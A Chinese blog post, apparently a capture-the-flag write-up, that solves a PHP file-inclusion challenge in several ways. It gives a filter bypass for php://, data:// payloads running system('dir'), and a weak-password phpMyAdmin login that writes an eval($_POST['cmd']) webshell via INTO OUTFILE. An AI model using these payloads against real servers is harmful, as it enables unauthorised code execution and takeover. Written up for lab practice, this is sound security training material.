攻防世界 Web_php_include的多种解法(含相关的伪协议用法)

最新推荐文章于 2023-04-16 00:48:41 发布
最新推荐文章于 2023-04-16 00:48:41 发布
阅读量1k 收藏 7
点赞数 1
分类专栏: CTF题目
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43400976/article/details/107510537
版权

攻防世界 Web_php_include的多种解法

在刷攻防世界题目的时候,发现这道题可以有很多解法哦,所以写个小总结记录一下。(如有不对,大佬们轻点喷)

<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
    $page=str_replace("php://", "", $page);
}
include($page);
?>
关于绕过函数str_replace的方法

1.大小写绕过
2. 双写绕过
一. 下面以大小写绕过为例:
使用burp
php://input可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行。
这是可以看到fl4gisisish3r3.php文件,然后读文件:
在这里插入图片描述
二. 利用php://input协议写入一句话木马
在这里插入图片描述
Tips:linux默认tmp是可写目录,所以尝试一句话,然后蚁剑连接,即可看到文件。
在这里插入图片描述
三.当过滤了php://的伪协议,我们可以使用data://伪协议
data:// 同样类似与php://input,可以让用户来控制输入流,如果传入的数据是PHP代码,导致任意代码执行。
payload:

http://220.249.52.133:40425/?page=data:text/plain,<?php system('dir'); ?>
http://220.249.52.133:40425/?page=data:text/plain;base64,PD9waHAgc3lzdGVtKCdkaXInKTsgPz4=

四. 数据库写入一句话木马
通过御剑扫描出目录:

http://220.249.52.133:40425/phpmyadmin/index.php

尝试用弱密码登录,username是root;password为空
先在sql查询窗口执行SHOW VARIABLES LIKE "secure_file_priv"
检查secure_file_priv是否为空,为空则可以写 如果是null表示不能写数据
在这里插入图片描述
然后写入一句话,成功执行,蚁剑连接

SELECT "<?php eval(@$_POST['cmd']); ?>"
INTO OUTFILE '/tmp/test.php'

在这里插入图片描述
相关参考链接:

https://blog.csdn.net/qq_42181428/article/details/87090539?utm_medium=distribute.pc_relevant_t0.none-task-blog-BlogCommendFromMachineLearnPai2-1.nonecase&depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-BlogCommendFromMachineLearnPai2-1.nonecase
Pr0m1se1n
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
getshell思路
Bu2n的博客
02-23 5707
getshell能干嘛文件上传getshell文件包getshellsql注入getshell操作系统漏洞getshellRCE getshell总结 授人以鱼,不如授人以渔 getshell能干嘛 1.执行终端命令 2.文件管理(增删改查) 3.数据管理(增删改查,前提找到root用户密码) 文件上传getshell 网站有上传点,最容易getshell。 直接上传一个一句话木马,然后使用webshell管理工具,就能成功getshell 如果web应用对上传文件的文件进行过滤,要想办法绕.
[CTF_网络安全] 攻防世界 Web_php_include详析(php伪协议、data伪协议、file伪协议)
2401_84208172的博客
05-24 1206
[CTF_网络安全] 攻防世界 Web_php_include详析(php伪协议、data伪协议、file伪协议),该考察文件包漏洞,涉及PHP伪协议data伪协议file伪协议PHP内置函数等知识点,希望读者躬身实践。黑客&网络安全如何学习。
fileclude(文件包漏洞及php://input、php://filter的使用)
Welcome To Myon'Blog !
04-16 4231
fileclude、文件包漏洞、php://input、php://filter、file_get_contents() 函数、empty()函数、isset函数、PHP伪协议
写入一句话木马姿势
weixin_48266255的博客
08-16 635
php写入一句话木马总结
include php 失效,为什么include(‘php:// input’)不起作用?
weixin_39603505的博客
03-16 1051
想象一下,玩具PHP应用程序容易受到绝对本地文件包的影响,例如我尝试了以下请求来利用它:POST /?action=php://input HTTP/1.1Host: XXXXXXXXXXXXXXXXXContent-Length: 3foo这有效地执行include(‘php:// input’);请求body foo,所以我希望它打印foo.但是,我收到以下错误Warning: inclu...
PHP文件包与一句话木马实验代码
a2788656708的博客
12-03 2689
文件包 1.新建phpinfo.php文件 2.用include语句包phpinfo.php文件 3.浏览器访问 1.利用require 语句包phpinfo.php文件 2.浏览器访问 一句话木马 ASSERT函数 1.利用assert函数创建get.php 2.浏览器访问 在url中 ip地址后输入 cmd=system("whoami"); 1.利用assert函数创建post.php 2.浏览器访问 在post data 栏 输入 ...
网络web安全与攻防技术_漏洞分析_网络攻防_网络安全_vulnerability_
09-29
常见网络安全协议工具使用方法,web安全漏洞分析、漏洞案例,web攻防思路分享。
攻防世界miss-01,杂项misc太湖杯
11-01
"攻防世界miss-01,杂项misc太湖杯" 暗示这是一个网络安全相关的挑战,特别是关于“攻防世界”平台上的一个名为“miss_01”的问,该问分类在“杂项”(misc)类别下,可能涉及多种技术技能。描述中提到的...
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此详细解博客:https://blog.csdn.net/m0_59188912/article/details/127836871
jiangzuo.rar_cloud computing java_网络攻防_防火墙
09-21
网络技术以及云计算系列讲解,包括网络攻防,防火墙技术等
网络攻防课程seed-labs实验-Web_SQL_Injection.zip
最新发布
06-01
《网络攻防课程:深入解析Web SQL注入》 在网络安全领域,Web应用安全是一个至关重要的环节,其中SQL注入(SQL Injection)是常见的攻击手段之一。本实验“网络攻防课程seed-labs实验-Web_SQL_Injection.zip”旨在...
31:WEB漏洞-文件操作之文件包漏洞全解
mingyqf的博客
04-03 1593
31:WEB漏洞-文件操作之文件包漏洞全解 思维导图 知识点 文件包漏洞``原理,检测,类型,利用,修复等` `原理:将文件以脚本执行` `文件包各个脚本代码``ASP,PHP,JSP,ASPXdeng``<!--#``include` `file=``"1.asp"` `-->``<!--#``include` `file=``"1.aspx"` `-->``<c:import url=``"http://thief.one/1.jsp"``>``<jsp
php输入流php://input详解
chijiu0328的博客
01-06 1084
PHP输入流php://input 在使用xml-rpc的时候,server端获取client数据,主要是通过php输入流input,而不是$_POST数组。所以,这里主要探讨php输入流php://input 对一php://input介绍,PHP官方手册文档有一段话对它进行了很明...
伪协议小总结
TMNOA的博客
03-26 198
凌云壮志酬
php://input allow_url_include,HTML_PHP教程:allow_url_includePHP常常因为它可能允许URLS被导 - phpStudy...
weixin_31029019的博客
03-09 231
PHP常常因为它可能允许URLS被导入和执行语句被人们指责。事实上,这件事情并不是很让人感到惊奇,因为这是导致称为Remote URL Include vulnerabilities的php应用程序漏洞的最重要的原因之一。因为这个原因,许多安全研究人员建议在php.ini配置中禁用指向allow_url_fopen。不幸的是,许多推荐这种方法的人,并没有意识到,这样会破坏很多的应用并且并不能保证1...
小迪安全笔记
ANYOUZHEN的博客
03-14 6330
1.后门 黑客留下的一个方便下次进入的网址 2.脚本语言主流php java python 3.常见漏洞 上传 代码执行 sql注入 变量覆盖 逻辑漏洞 反序列化 xss
php文件包漏洞(input与filter)
a173262565的博客
03-06 1232
php://input php://input可以读取没有处理过的POST数据。相较于$HTTP_RAW_POST_DATA而言,它给内存带来的压力较小,并且不需要特殊的php.ini设置。php://input不能用于enctype=multipart/form-data。 php://filter协议 协议语法: php://filter:/<action>=...
php://input和php://filter的详解与应用
酉酉的博客
02-28 1643
php:// php:// — 访问各个输入/输出流(I/O streams) php://input php://input 是个可以访问请求的原始数据的只读流。 简单来说就是就是读取POST的原生数据 比如: &lt;?php $file = $_GET['file']; echo file_get_contents($file,'r'); echo "&lt;br&gt;&lt;/...
攻防世界web_php_include
03-16
攻防世界中的 web_php_include 是一种漏洞,它指的是在 PHP 程序中使用 include 或 require 语句加载文件时可能存在的安全问。这种漏洞可能导致远程代码执行攻击,允许攻击者在服务器上执行任意代码。为了防止这种漏洞,应该对包的文件进行严格验证,确保只包可信的文件。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值